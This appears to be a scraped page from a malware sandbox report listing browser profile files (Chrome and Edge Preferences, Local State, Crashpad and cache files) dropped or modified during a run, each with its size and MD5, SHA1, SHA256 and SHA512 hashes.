d789cc7f085932f68e272bbf954a73afbb18cf4ed7cd822e9b13de27fdb9459a8f827cc74ce6b4cebaac071c5b04d95779e9cd7dbc93f313fe3d177455b2c8f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
75d0124b37d39c3d7265ae99b3aea94b

SHA1
fda26b6bd7e538e4acf9111e2e33edb9c0e8c244

SHA256
92b0103c478b9664ea736a5ccb0a8e397290179c59f60addc41ca61e6bf9ab5e

SHA512
5bef9167000b9bcc6fcc86554cf6755e998cb6a62705a4675511e71d5f82fa1dd26dce77009ffd77f1af88f25603b322c8ba9dd1e9f97f02caf09d2f744532cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
56639f08b835668a3c18f4425c75795c

SHA1
9a4d76414e26af1dc89d88695853d1a8ac5fdd11

SHA256
e8fa9002a4401ca63eaf33a2269cea913d628d1d9b3b5d69ac24ba2c6549e110

SHA512
9a790027d4de6c5fc36b2dbca155ed29cb0abb008a3b5a08da832becfe26523c52b78bec4413e87e34d67ebc4f02c40e52beed1538a278e6d3d7c7603a74567a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b23767ff686f962b1493398ebccf9872

SHA1
f3ee13a8c111469e3b87ce50421808e53f7ad2a0

SHA256
2e804c9ac274af954d38b638e68a31319319359102855a756a2386bab6e3b558

SHA512
7308bd7890ee8f8e3a8d661b916654bfde4ba72358e99eecb7b1daada5f842fc9e2be01485d2eef4efcca59bc8fcfa418f0165b7be6c39a0a7ff1e55d8bbb9ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bd077d7701064fc2de92d59b18100c11

SHA1
9d368d4f3f5c0abec8e2c76665eb55e1fdeb8a14

SHA256
569a65bc67442a9cd0b9ba443ffb6e0d7e06f7f1ad0259251b7e3f8b017a0d02

SHA512
a37326ef9405d06b30824ba8732f1bc5d35049f49767a1569c84a2d57610321bb1668ec4146622c219fef451e3e8b391778f7e4221808c5ef7448afb895293d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
05d9550c3bb375c7f03bb6948552fd7e

SHA1
46440eabbaf240d4aebc17ea8c245f482c76f9e1

SHA256
048c388e98ee0d084615defb4ef957404e2ffa3ce055cf53b17f9c32fdd89876

SHA512
5ee30e4cdda159599ccb2f524bfb791733c186181d14098fca011f5ec549d14868b4822713881137d65a126fdaedc4e8b418606a0d1d6907ecae59a6bab956ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d9fc7a48-2790-441f-b1b5-de8d46c39ab0.tmp

Filesize
8KB

MD5
5ff61d852032aba5db249d041f527fe1

SHA1
5b874f9aa112e411bae37ff3d444693ebf6b3207

SHA256
f9423806c9b9d95aa7cd745a58c52ec28400f23de7e3bce4e8eec2e9f9a0ba3a

SHA512
9b41b8afa431b2e6e9ac96031c9d556101746232105c5ac8a7d755dffbd1ed8691aaaabee5da4687a018305f282731b995165f81bab25781e2d9bf95f2b9210d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
183KB

MD5
19e2cc3bed9a1d733086bff652dbda03

SHA1
003911da5e93cac7b8c977f764a3baf6ac5c7bfd

SHA256
423af7797d38896f02d957a0337ed3f2316156e0faa4cdfbbfab341424f8cd06

SHA512
f4ddf0540e4641a0e1bab54d22b91cc2e64374709d65978edb41621d8bcfec8cc1d793494a63ea317495d6d8bdd3413c5bfcba4b861f8491caee32f31b239a7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
183KB

MD5
d40a90df2bf41a1466fa4d42ae79fcc8

SHA1
271ecbc196d258176014d740cf4492e02e417106

SHA256
7a9bf838a201e0ed4a09bf17c8d60287b0a496453a1f876d84a99840208a6121

SHA512
d178d6da57606aae4706d21bfae2942076ac39be2e95a5a54c4ec1ec1cbf449b1e0becc9a377aec4d487a71ac4b12d2e110dfd193fed4fa1564d72efb804b6df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
eaaad45aced1889a90a8aa4c39f92659

SHA1
5c0130d9e8d1a64c97924090d9a5258b8a31b83c

SHA256
5e3237f26b6047f64459cd5d3a6bc3563e2642b98d75b97011c93e0a9bd26f3b

SHA512
0db1c6bdb51f4e6ba5ef4dc12fc73886e599ab28f1eec5d943110bc3d856401ca31c05baa9026dd441b69f3de92307eb77d93f089ba6e2b84eea6e93982620e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3ee50fb26a9d3f096c47ff8696c24321

SHA1
a8c83e798d2a8b31fec0820560525e80dfa4fe66

SHA256
d80ec29cb17280af0c7522b30a80ffa19d1e786c0b09accfe3234b967d23eb6f

SHA512
479c0d2b76850aa79b58f9e0a8ba5773bd8909d915b98c2e9dc3a95c0ac18d7741b2ee571df695c0305598d89651c7aef2ff7c2fedb8b6a6aa30057ecfc872c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5d836d753bcedf849646a2d6d6ea6eec

SHA1
620e53dc29b044174049393e1b5091660fe6b33f

SHA256
d5820c8cfa2f87b46d34421ef45dc1a632e18800a5b979d2d0b3bb627c3271a2

SHA512
aff3230b3d6050df38aa5e17f39a380db8870e221690304e5cc726c1c68ab1c6d571f1d5fb298e7ed75b304552b2e9983ad072d9bd0f4a569151b55d52ddb66b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d850514160ea72ac46b796b610daae90

SHA1
f4d19580889cbac2c7f6dcd9cb5084c5a8f14079

SHA256
5bc34375b60b73a4b0c3edd8ea4ee320c22809132da52d23aa00e50d927e61f7

SHA512
f41ea7203fba50bbd429e566b045f91518b5a2ad3c3ea6eb4aa342231c795b82ea598cc703b55dbc5a617346678fe139a97660aefa46e30638df7fda33705237

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4d282ba3135d800f7a723c187fd9e777

SHA1
3583634cf92a3cce142dc8578864dbbc9efc4492

SHA256
c01665939362af8b9174d989c0906d8f752495964eacb486044b51b2cdd4d50a

SHA512
21f582931918e536368bef3df545a636295d08a9c38aaf02eab229c6b4b898db5ca17254607a23f1debe4d53d818b6c1ad611e5ade70939e7734e23ed8348eb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit